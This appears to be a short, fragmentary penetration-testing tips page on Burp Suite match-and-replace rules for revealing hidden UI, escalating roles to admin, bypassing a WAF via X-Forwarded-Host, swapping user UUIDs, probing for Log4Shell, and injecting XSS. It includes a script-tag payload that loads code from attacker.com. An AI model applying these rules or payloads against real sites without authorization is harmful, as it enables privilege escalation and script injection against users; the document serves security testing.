Useful Match and Replace BurpSuite Rules
Many websites contain hidden buttons, forms, and other UI elements like
Show Hidden UI (1)
Show Hidden UI (2)
Change disable to enable
false
to true
Sometimes we can get hidden features by changing from false
to true
. The example:
Changing role from normal user to admin
Make email verified
Bypassing WAF by adding some headers
Adding X-Forwarded-Host: 127.0.0.1
Create another rule but change the header to:
By changing original user UUID to another UUID
Create another rule but change the
type
to "Request First Line"
By adding some XSS payload into the request
Finding XSS on User-Agent
Finding XSS on Referer
Auto replace user input with XSS payload
So by just inputting the words
xss_payload
on the website it will be immediately replaced with"><script src=https://attacker.com></script>
Change the XSS payload as you want
Some random match and replace rules
Finding CVE-2021-44228
Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere
Help companies to identify your traffic and separate them from malicious traffic by adding a custom header
References: